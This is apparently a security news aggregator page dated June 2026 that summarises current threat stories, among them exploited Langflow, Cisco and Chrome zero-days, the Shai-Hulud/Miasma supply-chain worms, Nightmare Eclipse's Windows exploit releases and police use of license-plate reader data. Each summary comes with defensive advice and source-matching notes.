SecLog

Tracking threats to information security and information freedom. Send feedback to seclog@jwest.org.
Updated 2026.06.10
Attackers exploit unpatched Langflow flaw CVE-2026-5027 to run code on exposed AI workflow servers
Tags: Zero-Days & CVEs, Technology & Software, Langflow, CISA
Attackers are exploiting a security hole in Langflow that can let outsiders take over internet-exposed servers without logging in. The flaw, CVE-2026-5027, is an unauthenticated remote-code-execution bug affecting Langflow, an open-source tool for building AI workflows; exploitation means attackers can send crafted requests to run their own commands on vulnerable systems, and the article says no patch is available yet.
Why it matters: Organizations using Langflow should treat this as urgent because an exposed server could be fully compromised with no valid account needed. If you run Langflow, restrict internet access, apply any vendor mitigations, monitor for compromise, and patch immediately once a fix is released.
Sources
Bill Toulas 2026.06.10 95%
This article updates the same underlying event by adding that exploitation of CVE-2026-5027 is being observed now, describing the bug as a path traversal in the file upload endpoint, noting arbitrary file write as the immediate impact, and pointing users to the latest Langflow release 1.10.0 while referencing prior fixes in langflow-base 0.8.3 and Langflow 1.9.0.
info@thehackernews.com (The Hacker News) 2026.06.10 100%
This article appears to be the initial report of active exploitation of CVE-2026-5027 in Langflow, and no existing tracked story covers this specific flaw or product.
Red Hat says more than 30 npm packages were backdoored to steal developer and cloud credentials
Tags: Breaches & Data Leaks, Supply Chain, Malware, Technology & Software, Red Hat, GitHub, npm, JFrog
More than 30 npm packages in Red Hat's @redhat-cloud-services namespace were compromised and used to deliver credential-stealing malware to developers who installed them. Researchers say attackers likely took over a Red Hat employee GitHub account, added malicious GitHub Actions workflows, and abused npm trusted publishing to release 96 backdoored package versions. The malware, a new Shai-Hulud variant dubbed Miasma, targeted GitHub Actions secrets, cloud credentials, SSH keys, package publishing tokens, Vault tokens, Kubernetes service-account tokens, Docker credentials, GPG keys, and .env files.
Why it matters: Developers and organizations that installed the affected packages may have had sensitive keys and tokens stolen, which can lead to wider compromise of code, cloud systems, and build pipelines. This is urgent: identify affected installs, remove the packages, and rotate all credentials and secrets that were present on impacted machines or CI/CD systems.
Sources
Bill Toulas 2026.06.10 67%
The article says Miasma was previously linked to the Red Hat npm package compromise and provides new technical context on the malware family behind that event, including credential theft from build environments, cloud services, and CI/CD pipelines and its self-propagating package poisoning behavior.
Ionut Arghire 2026.06.09 86%
The piece explicitly identifies the Red Hat npm package incident as the first June 1 Miasma wave, adding that it was part of a broader coordinated Shai-Hulud outbreak affecting dozens more npm and PyPI packages.
2026.06.02 98%
This article is a direct update on the same Red Hat package compromise, adding that 32 affected packages were being downloaded about 117,000 times per week, that Red Hat traced distribution to a compromised GitHub account, removed the packages, and linked the malware to a Mini Shai-Hulud variant dubbed Miasma.
Ionut Arghire 2026.06.02 98%
This article covers the same Red Hat npm supply-chain attack and adds specifics on the timing and scale of publication (96 malicious versions across 32 packages in 72 seconds), suspected access path (CI/CD or npm scope credentials), links to the Mini Shai-Hulud-style worm, and evidence that at least 210 repositories may contain stolen credentials.
2026.06.01 98%
This directly updates the same Red Hat npm supply-chain compromise, adding that at least 32 package releases in the @redhat-cloud-services namespace were infected with a Mini Shai-Hulud variant, tied by Wiz to a compromised Red Hat employee GitHub account, with package download volume around 80,000 per week and expanded Azure/GCP credential theft behavior.
Lawrence Abrams 2026.06.01 100%
This article establishes a distinct supply-chain incident centered on compromised Red Hat npm packages and a Miasma/Shai-Hulud credential-stealing payload, not the same underlying event as the existing @antv Mini Shai-Hulud story or other tracked package compromises.
Suspected Miasma worm compromises more than 70 Microsoft GitHub repositories and breaks Azure CI/CD workflows
Tags: Malware, Supply Chain, Technology & Software, Microsoft, GitHub, JFrog
GitHub disabled more than 70 Microsoft repositories after attackers allegedly used a compromised contributor account to push malicious commits into projects including Azure/durabletask and Azure/functions-action. StepSecurity says the Miasma worm planted configuration files that could trigger remote code execution when a developer opened the repository in an integrated development environment or AI coding tool such as Claude Code, Gemini CLI, or Cursor, and the takedowns disrupted workflows that depended on Azure/functions-action@v1.
Why it matters: This affects developers and organizations that rely on Microsoft's open-source Azure tooling, with both supply-chain risk and immediate build-pipeline disruption. Teams using the affected repositories should review recent commits, rotate contributor and automation tokens, check developer machines for malicious config execution, and verify dependencies before restoring pipelines.
Sources
Bill Toulas 2026.06.10 82%
This article adds specific technical detail about the same Miasma campaign family linked to the Microsoft repository compromises, including that the source code was deliberately leaked via compromised GitHub accounts, how it steals cloud and CI/CD secrets, abuses GitHub as its control channel, targets npm, PyPI, RubyGems and JFrog Artifactory, and includes a destructive dead-man switch that wipes files if a stolen GitHub token is revoked.
2026.06.09 95%
This is a direct update on the same Miasma campaign, adding that the worm's full attack toolkit was open sourced via GitHub using previously compromised accounts, with new technical detail on its capabilities across GitHub, package registries, Artifactory, GitHub Actions, AI tool config poisoning, SSH lateral movement, and GitHub-based command-and-control.
Bill Toulas 2026.06.09 99%
This article is a direct update on the same June 5 Microsoft GitHub repository compromise, adding that GitHub disabled 73 repositories for 105 seconds, Microsoft has restored them, notified a small number of potentially affected customers, and BleepingComputer ties the incident more concretely to the Miasma/Shai-Hulud supply-chain campaign and the earlier durabletask compromise.
Ionut Arghire 2026.06.09 68%
The article ties the Miasma variant to the broader Shai-Hulud family and notes it emerged after the worm source code was released, helping connect the malware lineage behind related GitHub and CI/CD compromise activity.
2026.06.08 100%
The article establishes a distinct Microsoft-focused compromise event: a suspected Miasma worm infection of 73 GitHub repositories that triggered GitHub takedowns and caused downstream Azure CI/CD failures, even if it is related to the broader Mini Shai-Hulud lineage.
Shai-Hulud supply-chain attack trojanizes 19 PyPI bioinformatics packages to steal developer and cloud secrets
Tags: Malware, Supply Chain, Technology & Software, Healthcare, Education, PyPI, GitHub, npm, Amazon Web Services, Google Cloud, Microsoft
Attackers compromised 19 Python packages on PyPI, including popular science and bioinformatics tools, and planted malware that can steal secrets from developer machines and continuous integration systems. Socket linked the activity to the broader Shai-Hulud campaign and said 37 malicious releases used executable .pth startup hooks to trigger code when Python starts, then fetched the Bun JavaScript runtime to run an obfuscated payload that targeted GitHub, npm, PyPI, AWS, GCP, Azure, Kubernetes, SSH, Docker, Vault, and Claude/MCP credentials.
Why it matters: Developers, researchers, and organizations using these packages may have had passwords, tokens, and cloud keys stolen without obvious signs. Anyone who installed affected versions should treat the environment as compromised, rotate secrets, and rebuild from known-good backups.
Sources
Bill Toulas 2026.06.10 55%
The source describes Miasma as an evolution of the earlier Shai-Hulud worm and notes that the earlier leak helped drive more advanced variants, making this a meaningful follow-on development in the same malware lineage affecting package ecosystems.
Ionut Arghire 2026.06.09 97%
This article is a direct expansion of the same Shai-Hulud malware campaign, adding that new Miasma and Hades variants spread across both npm and PyPI from June 1, hit over 100 packages and 471 malicious artifacts, and used updated loader and evasion techniques while continuing credential theft and self-propagation.
Bill Toulas 2026.06.08 100%
This article establishes a distinct new Shai-Hulud campaign on PyPI, separate from the previously tracked npm-focused Shai-Hulud incident.
CISA says new directive will change how federal agencies prioritize and patch cyber vulnerabilities
Tags: Policy & Regulation, Urgent Patches, Government, CISA
CISA says it is about to change how U.S. federal agencies handle software flaws, telling them to focus first on the vulnerabilities and systems that pose the highest real-world risk. Acting Director Nick Andersen said a binding operational directive due Wednesday will shift agencies away from treating every patch the same and toward prioritizing internet-exposed assets, Known Exploited Vulnerabilities, exploit automation, and critical functions; CISA also plans closer risk reviews with critical infrastructure operators.
Why it matters: This could change patching deadlines and vulnerability-management practices across the federal government and influence how critical infrastructure owners prioritize fixes. Agencies and defenders should watch for the directive’s release because it may require faster action on the most dangerous exposed systems while de-emphasizing lower-risk issues.
Sources
2026.06.10 97%
This article is a direct update on the same CISA binding operational directive, adding the specific 72-hour requirement for vulnerabilities meeting three of four criteria, the criteria themselves, the 180-day implementation window, and the requirement to perform compromise triage before patching.
2026.06.09 100%
The article establishes a new, specific CISA policy event: an imminent binding operational directive that will alter federal vulnerability prioritization and remediation requirements.
GitHub changes npm defaults in npm 12 to stop auto-running install scripts and block risky remote dependency paths
Tags: Policy & Regulation, Supply Chain, Technology & Software, GitHub, npm
GitHub says npm 12 will no longer run package install scripts by default, changing behavior that has long let malicious dependencies execute code on developer machines and continuous integration systems. The July release will disable automatic preinstall, install, and postinstall lifecycle scripts unless explicitly allowed with allow-scripts, turn --allow-git off by default, and set allow-remote to none to block remote URL dependency downloads; the move follows repeated supply-chain abuse, including Shai-Hulud-style malicious packages.
Why it matters: Developers and organizations that use npm may need to update build and install workflows before npm 12 ships, but the change should reduce one of the ecosystem's biggest package-based malware risks. Security teams should test projects now, identify legitimate packages that need script exceptions, and tighten CI defaults.
Sources
Bill Toulas 2026.06.10 98%
This article directly covers GitHub's announced npm 12 security changes, adding specifics on which install hooks and dependency sources will require explicit approval and noting npm 11.16.0 warnings to help developers prepare.
2026.06.10 100%
This article establishes a distinct ecosystem-level security hardening event: npm/GitHub is changing default package-manager behavior in response to supply-chain abuse, rather than detailing a single compromise or malware campaign.
Microsoft says three publicly dumped Windows zero-days are already being exploited after Nightmare Eclipse disclosures
Tags: Policy & Regulation, Urgent Patches, Zero-Days & CVEs, Technology & Software, Consumers & General Public, Microsoft
A researcher’s public release of six Windows zero-days has already led attackers to exploit three of them, and Microsoft says more unpatched flaws remain. Microsoft named the bugs as RedSun, UnDefend, BlueHammer, YellowKey, GreenPlasma, and MiniPlasma; it said BlueHammer, RedSun, and UnDefend saw attacks after proof-of-concept exploit code was posted, while YellowKey is tracked as CVE-2026-45585 and, along with GreenPlasma and MiniPlasma, still lacks a fix.
Why it matters: Windows defenders may have little time between public disclosure and real-world attacks, especially when proof-of-concept exploit code is available. Organizations should review Microsoft mitigations immediately, monitor for compromise tied to these bug names and CVE-2026-45585, and prioritize hardening or temporary workarounds where patches do not yet exist.
Sources
2026.06.10 66%
The article also materially updates the broader Nightmare Eclipse disclosure saga by identifying RoguePlanet as the seventh public Microsoft zero-day from the same researcher and connecting it to the earlier pattern in which previously dumped flaws were later exploited before patching.
Sergiu Gatlan 2026.06.10 73%
The article is tied to the same Nightmare Eclipse disclosure wave and adds that Microsoft patched GreenPlasma and MiniPlasma, two of the publicly dumped Windows zero-days, during June 2026 Patch Tuesday.
Lawrence Abrams 2026.06.09 72%
This article adds another public zero-day release by the same researcher, Nightmare Eclipse, extending the ongoing disclosure dispute with Microsoft and showing a newly published Microsoft Defender local privilege-escalation exploit that appears to work on fully patched Windows 10 and 11 systems.
BrianKrebs 2026.06.09 87%
The piece ties two June Patch Tuesday zero-days to the same Nightmare Eclipse disclosure campaign, specifically connecting GreenPlasma to CVE-2026-45586 and YellowKey to CVE-2026-50507, while noting the researcher plans more releases.
Eduard Kovacs 2026.06.03 93%
This article covers the same underlying event: the Nightmare Eclipse/Chaotic Eclipse public disclosure of multiple unpatched Microsoft vulnerabilities, including RedSun, UnDefend, BlueHammer, and YellowKey. It adds new reporting on Microsoft's response to backlash over language seen as threatening legal action, clarifies that Microsoft says it does not intend to pursue action against good-faith researchers, and provides more detail on the researcher-vendor dispute and Microsoft's takedown of the researcher's portal and GitHub access.
2026.06.02 95%
This article covers the same underlying Nightmare-Eclipse Windows zero-day disclosure saga and adds new information that Microsoft publicly softened its rhetoric, said it does not intend to pursue legal action against researchers publishing security research, and acknowledged criticism over its earlier response after some of the dumped flaws were exploited in the wild.
Bruce Schneier 2026.06.02 95%
This article is about the same Nightmare Eclipse disclosure campaign and adds that Microsoft has threatened legal action against the anonymous researcher behind the published Windows exploits.
2026.06.01 93%
This article directly updates the Nightmare Eclipse Windows zero-day disclosure saga by adding Microsoft's walk-back: Microsoft says it does not intend to pursue legal action against researchers and acknowledges that some researcher interactions fell short; the source also notes that Nightmare Eclipse plans to release another Secure Boot flaw that could bypass BitLocker and affect confidential VMs.
2026.05.29 95%
This directly updates the same Nightmare Eclipse Windows zero-day disclosure campaign with Microsoft's first formal response, confirmation that the researcher threatened another release on July 14, and added context on GitHub and Blogger pages being taken down.
2026.05.28 100%
This article establishes a broader underlying event than the existing YellowKey story: a coordinated cluster of six Windows zero-day disclosures by Nightmare Eclipse, with three already exploited and multiple flaws still unpatched.
Researcher releases RoguePlanet Windows zero-day that can give SYSTEM access on patched Windows 10 and 11
Tags: Malware, Zero-Days & CVEs, Technology & Software, Consumers & General Public, Microsoft
A security researcher published a new Windows zero-day exploit that can give an attacker full SYSTEM privileges on fully patched consumer PCs. The proof-of-concept, dubbed RoguePlanet, abuses a race condition in Microsoft Defender to achieve local privilege escalation on Windows 10 and Windows 11 systems with June 2026 updates installed; the researcher says earlier versions also enabled remote code execution through malicious .vhd(x) files on remote SMB shares and BitLocker bypass paths, but the currently released exploit is validated primarily as local escalation and reportedly does not yet work on Windows Server.
Why it matters: This matters because a public exploit can help malware or intruders turn limited access on a Windows machine into full control even after current patches are installed. Organizations should watch for Microsoft guidance, restrict untrusted SMB and disk-image handling where possible, and prioritize detection for SYSTEM-level escalation from Defender-related activity.
Sources
2026.06.10 99%
This article is directly about the same newly disclosed RoguePlanet Windows Defender zero-day, adding that The Register reports Microsoft is investigating the claim, that the bug targets Microsoft Defender on fully patched Windows 10 and 11 systems, and that Nightmare Eclipse released PoC exploit code after June Patch Tuesday.
Ionut Arghire 2026.06.10 100%
The article establishes a distinct new event: the public release and validation of a new, currently unpatched Microsoft Defender/Windows privilege-escalation exploit called RoguePlanet, separate from the previously tracked YellowKey and other Nightmare Eclipse disclosures.
ShinyHunters targets Oracle PeopleSoft servers in data-theft attacks against more than 100 organizations
Tags: Breaches & Data Leaks, Threat Actors & APTs, Zero-Days & CVEs, Education, Government, Consumers & General Public, Oracle, University of Nottingham
Oracle PeopleSoft customers are being hit in ongoing break-ins and extortion attacks that ShinyHunters says have affected more than 100 organizations and 300 PeopleSoft instances. The campaign reportedly targets both cloud and on-premises PeopleSoft deployments, with the attackers claiming to use a chain of older bugs and at least one zero-day, though no CVE has been confirmed by Oracle. Reported evidence includes extortion notes, exposed attacker tooling, and IP-based indicators of compromise tied to infrastructure previously linked to ShinyHunters.
Why it matters: PeopleSoft is widely used for payroll, HR, finance, procurement, and student systems, so a compromise can expose highly sensitive employee, customer, or student data. Organizations running PeopleSoft should urgently review logs for the listed IPs, investigate possible unauthorized SSH access, and prepare incident response while waiting for Oracle guidance.
Sources
Lawrence Abrams 2026.06.10 100%
This article appears to be the first clear report establishing a distinct ShinyHunters campaign specifically targeting Oracle PeopleSoft environments across many organizations, with claimed victim count, tactics, and IOCs.
EFF says police used Flock Safety license plate reader data for school residency checks, background screening, and minor complaints
Tags: Surveillance & Privacy, Policy & Regulation, Government, Education, Technology & Software, Consumers & General Public, Flock Safety, EFF
EFF says police agencies searched Flock Safety automated license plate reader databases for routine matters far beyond serious criminal investigations, including school residency verification, employment background checks, and noise complaints. Based on analysis of millions of audit-log searches, the report says some agencies queried plates across thousands of shared camera networks nationwide, exposing detailed location histories without a warrant requirement and showing broad mission creep in how ALPR (automated license plate reader) data is used.
Why it matters: This matters to the public because a system marketed for crime-solving is being used to track ordinary people’s movements for low-level administrative and quality-of-life issues. It raises immediate privacy and civil-liberties concerns for anyone whose vehicle data may be swept into shared ALPR networks, and it increases pressure for warrant limits, access controls, and retention safeguards.
Sources
Hudson Hongo 2026.06.10 79%
This newsletter item recaps and amplifies EFF's reporting on ALPR mission creep, specifically that license plate reader systems are being used for low-level matters such as noise complaints and other minor investigations rather than only serious crime.
Rindala Alajaji 2026.05.26 100%
This article establishes a distinct surveillance/privacy story centered on EFF's new findings about Flock Safety ALPR mission creep and the warrantless use of location data for non-criminal purposes.
China-linked JDY botnet grows and expands reconnaissance targeting of U.S. military networks
Tags: Malware, Threat Actors & APTs, Government, Defense & Aerospace, Technology & Software, Consumers & General Public, Cisco, Ubiquiti, DrayTek, Hikvision, Linksys, Fortinet
Researchers say the China-linked JDY botnet has grown to more than 1,500 compromised small-office/home-office and internet-connected devices and is increasingly used to probe U.S. military and related networks. Black Lotus Labs says JDY is tied to China-nexus activity previously associated with Volt Typhoon and is used for distributed scanning, banner grabbing, TLS certificate collection, and fingerprinting to find vulnerable systems soon after flaws are disclosed, including scans for FortiClient EMS bug CVE-2026-35616. The botnet uses infected routers and IoT devices from vendors including Cisco, Ubiquiti, DrayTek, Hikvision, Linksys, Araknis, and Mimosa, with command-and-control routed through Tor hidden services.
Why it matters: This matters because compromised routers and IoT gear are being used to quietly map weak points in networks tied to sensitive U.S. targets, helping follow-on intrusions. Organizations should patch exposed network devices quickly, reduce internet-facing services, and watch for scanning and unusual activity from SOHO and IoT infrastructure.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 98%
The article appears to cover the same underlying event: expansion of the China-linked JDY botnet to more than 1,500 devices and its use for reconnaissance focused on U.S. military networks.
Bill Toulas 2026.06.10 100%
This article establishes a distinct story about the JDY botnet's expansion, its China-linked reconnaissance role, and its specific focus on U.S. military-associated targets rather than a single already-tracked exploit or policy event.
Cyberattack shuts down Mackay Sugar mills in Queensland and halts cane harvest
Tags: Breaches & Data Leaks, Manufacturing, Mackay Sugar
A cyberattack forced Mackay Sugar, one of Australia's largest sugar producers, to shut down two mills in Queensland and stop sugarcane harvesting in the Mackay region. The company said the incident affected parts of its operations and that cybersecurity experts and authorities are investigating while systems are restored. No ransomware claim, data-theft disclosure, or technical details about the intrusion method have been confirmed yet.
Why it matters: This is a real-world operational technology and business disruption incident affecting food production and local growers, not just office IT. Organizations in agriculture and other industrial sectors should review incident response plans, segmentation between business and plant systems, and contingency procedures for outages.
Sources
2026.06.10 100%
This article establishes the incident itself: a newly disclosed cyberattack on Mackay Sugar that shut down Farleigh and Racecourse mills and interrupted harvest operations.
Cisco discloses exploited Catalyst SD-WAN Manager zero-day CVE-2026-20245 with no patch yet
Tags: Urgent Patches, Threat Actors & APTs, Zero-Days & CVEs, Cisco
Cisco says attackers are exploiting a new zero-day in Catalyst SD-WAN Manager, and affected organizations do not yet have a patch. The flaw, CVE-2026-20245, is a command-injection vulnerability in the command-line interface that lets an authenticated local attacker with netadmin privileges execute arbitrary commands as root by uploading a crafted file. Cisco said exploitation has been limited but that it has observed cases where attackers pushed configuration changes to edge devices, and it has published indicators of compromise.
Why it matters: Organizations running Cisco Catalyst SD-WAN Manager face an actively exploited flaw that can give attackers full control of the system, with no fix available yet. Defenders should urgently check Cisco's indicators of compromise, restrict and review privileged access, hunt for abuse of related SD-WAN flaws, and prepare to patch as soon as Cisco releases updates.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 92%
This source updates the same Cisco event by saying CISA added CVE-2026-20245 to KEV amid active exploitation, which strengthens the operational urgency for organizations running Catalyst SD-WAN Manager while waiting for a vendor fix and applying available mitigations.
info@thehackernews.com (The Hacker News) 2026.06.06 99%
This article covers the same underlying event: Cisco's disclosure that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited in the wild and currently lacks an available fix.
2026.06.05 98%
This article is a direct report on the same event: Cisco's disclosure that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited in the wild with no patch available. It adds reporting detail that exploitation appears to date back at least a week, that all versions and deployment types including FedRAMP are affected, and that Cisco says attackers would need netadmin access or exploitation of CVE-2026-20182 or CVE-2026-20127.
Sergiu Gatlan 2026.06.05 99%
This article covers the same underlying event: Cisco's warning that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited as a zero-day with no patch available. It adds concrete details on the privilege-escalation path, affected deployment types, Mandiant's role in reporting, the dependency on valid netadmin access or exploitation of CVE-2026-20182/CVE-2026-20127, observed configuration changes pushed to edge devices, and example indicators of compromise in scripts.log.
Eduard Kovacs 2026.06.05 100%
This article establishes a distinct new event: Cisco's disclosure of in-the-wild exploitation of CVE-2026-20245 in Catalyst SD-WAN Manager, a separate zero-day from the other Cisco and SD-WAN stories already tracked.
Google patches exploited Chrome zero-day CVE-2026-11645 in Chrome 149
Tags: Urgent Patches, Zero-Days & CVEs, Technology & Software, Consumers & General Public, Google
Google released a Chrome 149 security update that fixes an actively exploited browser flaw, putting Chrome users at risk until they update. The zero-day, CVE-2026-11645, is a high-severity out-of-bounds read/write bug in the V8 JavaScript engine that can let a remote attacker run code inside Chrome’s sandbox via a specially crafted HTML page; exploitation likely requires chaining with a separate sandbox-escape flaw for full compromise. Google said the bug was reported in late April by an anonymous researcher.
Why it matters: Anyone using Chrome should update promptly because this flaw is already being used in real attacks. Even though the code runs inside Chrome’s sandbox, browser zero-days are high-priority because attackers often combine them with other bugs to fully compromise devices.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 90%
This article appears to advance the same Chrome event by reporting CISA has added the actively exploited Chrome flaw CVE-2026-11645 to KEV, reinforcing that exploitation is confirmed and that affected users and enterprises should prioritize updating Chrome 149 or later.
2026.06.09 97%
This article is a direct update on the same event, adding that CVE-2026-11645 is an out-of-bounds memory access bug in Chrome's V8 JavaScript engine, that Google paid a $55,000 bounty for the report, and that it is the fifth exploited Chrome zero-day fixed in 2026.
info@thehackernews.com (The Hacker News) 2026.06.09 99%
It covers the same underlying event: Google's patch for the actively exploited Chrome V8 zero-day CVE-2026-11645, reinforcing the urgency to update affected Chrome installations.
Sergiu Gatlan 2026.06.09 98%
This article reports the same underlying event: Google's emergency fix for CVE-2026-11645, an in-the-wild exploited Chrome zero-day in Chrome 149, and adds rollout version details for Windows, macOS, and Linux plus technical context that the flaw is an out-of-bounds read/write bug in the V8 engine reachable via crafted HTML.
Eduard Kovacs 2026.06.09 100%
This article establishes a new tracked event centered on CVE-2026-11645, a distinct Chrome zero-day that Google says was exploited in the wild and patched in Chrome 149.
Arista says exploited EOS flaw CVE-2026-7473 will not be patched and affected switch owners must use mitigations
Tags: Urgent Patches, Zero-Days & CVEs, Technology & Software, Telecommunications, Arista, CISA
Arista says hackers have exploited a flaw in its EOS network operating system, and some affected switch platforms will not get a software fix. The issue, CVE-2026-7473, affects certain Arista devices configured as tunnel endpoints and can cause them to accept and decapsulate unconfigured tunnel traffic sent to the same IP address. Arista says impacted products include 7020R, 7280R/R2, and 7500R/R2 series, with some IPv6 decapsulation scenarios also affecting 7280R3, 7500R3, and 7800R3. CISA has added the bug to its Known Exploited Vulnerabilities list.
Why it matters: Organizations using affected Arista switches may be exposed right now, and there is no vendor patch planned, so this is a mitigation-or-replace situation rather than a routine update. Network defenders should identify affected tunnel configurations immediately, apply Arista's workarounds, and prioritize review because CISA says the flaw is being actively exploited.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 88%
This article updates that event by noting CISA has now added Arista EOS CVE-2026-7473 to the KEV catalog, confirming federal prioritization of the actively exploited flaw and increasing urgency for organizations that must rely on mitigations because some platforms will not receive a patch.
Ionut Arghire 2026.06.10 100%
This article establishes a new tracked story because it centers on a distinct exploited Arista EOS vulnerability, CVE-2026-7473, with no patch planned and fresh KEV action, which is not the same underlying event as any existing tracked story.
KrebsOnSecurity links The Gentlemen ransomware group to a suspected administrator in Izhevsk, Russia
Ransomware, Threat Actors & APTs
A new report identifies a suspected real-world operator behind The Gentlemen, one of 2026's most active ransomware groups. KrebsOnSecurity, drawing on Check Point, Intel 471, Flashpoint, and Constella data, says the ransomware-as-a-service group has claimed at least 332 victims since mid-2025 and more than 240 in 2026, recruits affiliates with a 90/10 ransom split, and commonly gains entry through internet-facing VPN and firewall devices before rapidly encrypting networks.
Why it matters: This is a major ransomware actor by victim volume, so the attribution and tradecraft details help defenders prioritize monitoring of exposed remote-access and edge devices. Organizations should review exposure of VPNs and firewalls, harden remote access, and watch for intrusion patterns associated with fast-moving affiliate-led ransomware attacks.
Sources
BrianKrebs 2026.06.10 100%
This article establishes a distinct story centered on attribution and operational analysis of The Gentlemen ransomware group, not an update to an existing tracked event.
CISA adds actively exploited Microsoft Exchange Server XSS flaw CVE-2026-42897 to KEV catalog
Zero-Days & CVEs, Urgent Patches, Government, Technology & Software, CISA, Microsoft
CISA on May 15, 2026 added CVE-2026-42897, a Microsoft Exchange Server cross-site scripting vulnerability, to its Known Exploited Vulnerabilities catalog based on evidence of active exploitation. Under BOD 22-01, federal civilian agencies must remediate by CISA's due date, and CISA urged all organizations to prioritize patching KEV-listed flaws.
Why it matters: Active exploitation of an Exchange Server flaw raises immediate risk for organizations running the product, especially federal agencies subject to KEV deadlines. Defenders should identify exposed Exchange instances and prioritize remediation or mitigation quickly.
Sources
Sergiu Gatlan 2026.06.10 96%
This article is a direct update to the same CVE-2026-42897 event, adding that Microsoft has now released June 2026 security updates to patch the actively exploited Exchange Server flaw after earlier warning of exploitation and temporary mitigations.
CISA 2026.05.15 100%
This article is the first tracked item here establishing the specific KEV event for CVE-2026-42897 and its active exploitation status.
Microsoft June 2026 Patch Tuesday fixes 200 flaws, including Windows zero-days CVE-2026-45586 and CVE-2026-50507
Zero-Days & CVEs, Urgent Patches, Technology & Software, Consumers & General Public, Microsoft
Microsoft released its June 2026 security updates to fix 200 vulnerabilities, including three publicly disclosed zero-days in Windows. The zero-days include CVE-2026-45586, a local privilege-escalation flaw in the Windows Collaborative Translation Framework (CTFMON) that can grant SYSTEM access, CVE-2026-49160 in HTTP.sys, and CVE-2026-50507, a BitLocker security-feature bypass requiring physical access. Microsoft says none of the three were known to be exploited at patch time.
Why it matters: Windows systems across enterprises and consumer devices may be exposed to newly public attack methods until they are patched. Organizations should prioritize June Patch Tuesday deployment and review Microsoft’s HTTP.sys mitigation guidance, while users should install Windows updates promptly.
Sources
2026.06.10 98%
This article reports on the same June 2026 Microsoft Patch Tuesday event and adds detail that it is Microsoft's largest Patch Tuesday on record, highlights the wormable Windows core flaw CVE-2026-45657, and notes that CVE-2026-41091 in Microsoft Defender was already added to CISA's KEV catalog as actively exploited.
Sergiu Gatlan 2026.06.10 69%
This is part of the same June 2026 Patch Tuesday event and adds concrete detail that the patched zero-days include YellowKey CVE-2026-45585 and MiniPlasma CVE-2020-17103 alongside GreenPlasma CVE-2026-45586.
info@thehackernews.com (The Hacker News) 2026.06.10 98%
This appears to be another report on the same June 2026 Microsoft Patch Tuesday event, describing the monthly batch of fixes, including three zero-days and critical RCE issues; it mainly adds alternate coverage and a slightly different flaw count.
2026.06.09 97%
This article is another report on the same June 2026 Patch Tuesday event, adding count details (206 CVEs, 38 critical), noting that none are yet confirmed exploited in the wild, and highlighting that CVE-2026-50507 is publicly disclosed while CVE-2026-49160 (HTTP.sys) was also patched in the same release.
BrianKrebs 2026.06.09 98%
This article is directly about the same June 2026 Patch Tuesday event and adds context on the record-breaking volume, the link to Nightmare Eclipse's GreenPlasma and YellowKey disclosures, and Microsoft's acknowledgment that June's browser fixes pushed the broader total far beyond the Patch Tuesday count.
Eduard Kovacs 2026.06.09 98%
This article is a direct report on the same June 2026 Microsoft Patch Tuesday event, adding that none of the flaws appears exploited in the wild, identifying CVE-2026-49160 as tied to the HTTP/2 Bomb denial-of-service technique, and noting nearly 40 issues are rated critical across Windows, Azure, Office, Outlook, Exchange, and AI tools.
Lawrence Abrams 2026.06.09 92%
This article is the Windows 10 ESU/LTSC delivery of the June 2026 Patch Tuesday fixes, confirming KB5094127 includes that month's 200 vulnerability fixes and adding operational details about Secure Boot certificate rollout monitoring and a known BitLocker recovery issue after recent updates.
Lawrence Abrams 2026.06.09 100%
The article establishes the broader June 2026 Microsoft Patch Tuesday event and introduces two publicly disclosed zero-days not already captured as standalone tracked stories.
Mayank Parmar 2026.06.09 93%
This article is the Windows 11 client-side rollout detail for the same June 2026 Patch Tuesday event, adding the specific KB packages (KB5094126 and KB5093998), affected Windows 11 versions (25H2/24H2 and 23H2), build numbers, and deployment guidance for installing the security fixes.
Claroty finds critical remote-attack flaws in Vertiv UPS cards and Trane Tracer SC+ HVAC controllers used in data centers
Zero-Days & CVEs, Urgent Patches, Technology & Software, Vertiv, Trane
Researchers found critical vulnerabilities in Vertiv UPS network cards and Trane Tracer SC+ HVAC controllers that could let hackers remotely disrupt power protection and cooling systems in data centers and other facilities. Claroty reported authentication-bypass and remote-code-execution flaws in Vertiv cards, and authentication bypass, remote code execution, denial-of-service, and sensitive-information exposure issues in Trane Tracer SC+ building-management controllers; the vendors have issued patches, but the article does not list CVE IDs or affected versions.
Why it matters: These products help keep servers powered and cool, so successful attacks could cause outages, hardware damage, or forced shutdowns. Organizations using Vertiv UPS management cards or Trane Tracer SC+ should identify exposed systems and apply vendor patches and mitigations quickly.
Sources
Eduard Kovacs 2026.06.10 100%
This article appears to be the first tracked item establishing the disclosure of these specific Claroty-reported vulnerabilities in Vertiv UPS cards and Trane Tracer SC+ controllers.
Meta asks court to hold NSO Group in contempt after alleged new WhatsApp phishing targeting
Surveillance & Privacy, Social Engineering & Phishing, Policy & Regulation, Threat Actors & APTs, Technology & Software, Telecommunications, Consumers & General Public, Meta, WhatsApp, NSO Group
Meta says NSO Group again targeted WhatsApp users despite a court order barring it from doing so. WhatsApp said it disrupted NSO-linked social-engineering attempts involving malicious links that redirected targets to external websites, plus test accounts and groups on the platform, and published related domains and indicators of compromise. The report did not include victim counts, timing, or confirmation of successful compromises.
Why it matters: This matters because it suggests a spyware vendor accused of abusing messaging users may still be actively targeting people after a legal ban. WhatsApp users, journalists, activists, and high-risk targets should treat unsolicited links and unusual group invites with caution, and defenders should review the published indicators immediately.
Sources
Bruce Schneier 2026.06.10 96%
This is the same underlying event: WhatsApp detecting renewed NSO-linked phishing targeting of its users despite an existing court order, adding an additional source noting the alleged violation and tying it to spyware activity.
Bill Toulas 2026.06.08 98%
This article reports the same underlying event: WhatsApp/Meta says it disrupted new NSO-linked one-click phishing activity targeting WhatsApp users, including test accounts and groups, and names the suspected infrastructure domains used in the campaign.
2026.06.08 99%
This article is a direct update on the same event: WhatsApp says NSO violated the court injunction by targeting users with spearphishing links and test accounts/groups, and that Meta is seeking a contempt order while sharing indicators of compromise.
Eduard Kovacs 2026.06.08 98%
